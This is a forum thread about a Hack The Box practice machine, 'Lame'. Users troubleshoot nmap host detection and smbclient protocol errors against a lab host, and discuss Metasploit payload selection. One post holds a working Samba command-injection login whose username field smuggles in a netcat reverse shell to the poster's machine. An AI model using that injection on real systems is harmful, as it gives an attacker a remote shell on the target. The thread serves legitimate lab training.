Issue with Lame?

edited February 12 in Machines

This is my 3rd box, and I figured it would be an easy one, but I run into some issues.
First: running nmap -A -oA nmap 10.10.10.3 gives me "Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn"

Works fine with -Pn.

Next, I tried to connect with smbclient without succeeding:

smbclient //10.10.10.3/tmp
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

Is this normal behavior for this box? Thanks

Tagged:

Comments

  • edited February 12

    Hmm so now I'm having a similar issue with Nibbles (the nmap issue). So I'm gonna try to restart my machine and vpn.

    Edit: After rebooting my VM, I don't need to use -Pn for Nibbles, but still have issues when running Lame. I'll just stay on Nibbles for now.

  • Also having the same problem with Lame.
    Anyone have any idea what the source of the problem could be?

  • Literally 2 mins after posting this I found the solution add the following line to the smb.conf file in the global section. - client max protocol = NT1

    I believe to force smbclient to use smb v1

  • i am getting NT_STATUS_CONNECTION_DISCONNECTED error while connecting with smbclient

  • @b00l3an said:
    Literally 2 mins after posting this I found the solution add the following line to the smb.conf file in the global section. - client max protocol = NT1

    I believe to force smbclient to use smb v1

    I was also having this problem. I tried adding

    client max protocol = NT1

    to the smb.conf file but ended up getting

    protocol negotiation failed: NT_STATUS_INVALID_PARAMETER_MIX

    I then added

    client min protocol = NT1

    after the client max protocol paramater and everything seemed to work.

  • The right command for me was: smbclient \\10.10.10.3\tmp to force Linux to recognize a backslash as a backslash character or use single quote.

    Fr0Ggi3sOnTour

  • The right command for me was: smbclient \\\\10.10.10.3\\tmp to force Linux to recognize a backslash as a backslash character or use single quote.

    I meant that.

    Fr0Ggi3sOnTour

  • okay so I am having issues too.

    this command made login successful:

    smbclient -L //10.10.10.3/ --option='client min protocol=NT1'
    Enter WORKGROUP\root's password:
    Anonymous login successful

    BUT smbclient \\10.10.10.3\tmp (and other variations) keep hitting me with :
    protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

    going off of another forum post's comments i tried smbmap -R -H 10.10.10.3
    which gave me
    [+] IP: 10.10.10.3:445 Name: 10.10.10.3
    Disk Permissions Comment
    ---- ----------- -------
    print$ NO ACCESS Printer Drivers
    tmp READ, WRITE oh noes!
    .\tmp*

    but still can't get into tmp.
    dunno if i'm missing something or it's going over my head bc of frustration.

  • [email protected]:~/htb/lame# smbclient //10.10.10.3/tmp --option='client min protocol=NT1' -U "./=nohup nc -e /bin/sh 10.10.14.2 443"
    nohup: ignoring input and redirecting stderr to stdout

  • Try editing the “smb” config file:
    sudo vi /etc/samba/smb.conf

    Add the following settings under “GLOBAL”:
    client min protocol = CORE
    client max protocol = SMB3

    Save and exit the file:
    Esc
    :wq
    Enter

  • So i am new to pen testing and was trying to nmap lame. nmap -sC -sV 10.10.10.3
    It give 0 host up error every time.If i try to use metasploit by searching walkthrough it generates this error
    10.10.10.3:139 - Exploit failed: An exploitation error occurred.
    [*] Exploit completed, but no session was created.

  • Type your comment> @AHKompany said:

    So i am new to pen testing and was trying to nmap lame. nmap -sC -sV 10.10.10.3
    It give 0 host up error every time.If i try to use metasploit by searching walkthrough it generates this error
    10.10.10.3:139 - Exploit failed: An exploitation error occurred.
    [*] Exploit completed, but no session was created.

    I am also having this exact same issue and am pulling my hair out to try and determine the cause. I got to the point where I have read multiple walkthroughs all ending with the same exploit but for me the exploit fails big shrug

  • Was just trying out this machine. I was trying to focus on 139,445 and the services would report as open, but a couple minutes later they'd be filtered. I've never been able to the anon login because I keep getting connection errors.

  • Regarding metasploit, I ran into this problem just now on Lame as well and was able to figure it out. My guess is the actual exploit itself has changed since the walkthroughs were written, or else maybe my metasploit somehow was different.

    Anyway, it appears the exploit did not have a payload specified, or else maybe had a generic payload specified. I did some Googling and found how to select and specify a payload using (withing metasploit) "show payloads". This will list the payloads which are compatible with your selected exploit. Then I just tried a few until I found one which worked. Note that you may need to define certain additional options once you've selected a payload, such as LHOST and LPORT. Just type "options" after choosing your payload and it should show what you need to define.

    Hope this helps.

  • Type your comment> @cow125 said:

    @b00l3an said:
    Literally 2 mins after posting this I found the solution add the following line to the smb.conf file in the global section. - client max protocol = NT1

    I believe to force smbclient to use smb v1

    I was also having this problem. I tried adding

    client max protocol = NT1

    to the smb.conf file but ended up getting

    protocol negotiation failed: NT_STATUS_INVALID_PARAMETER_MIX

    I then added

    client min protocol = NT1

    after the client max protocol paramater and everything seemed to work.

    thanks mate, worked fine for me

    0xpr0N3rd

  • Type your comment> @cow125 said:

    @b00l3an said:
    Literally 2 mins after posting this I found the solution add the following line to the smb.conf file in the global section. - client max protocol = NT1

    I believe to force smbclient to use smb v1

    I was also having this problem. I tried adding

    client max protocol = NT1

    to the smb.conf file but ended up getting

    protocol negotiation failed: NT_STATUS_INVALID_PARAMETER_MIX

    I then added

    client min protocol = NT1

    after the client max protocol paramater and everything seemed to work.

    Thanks mate worked for me

Sign In to comment.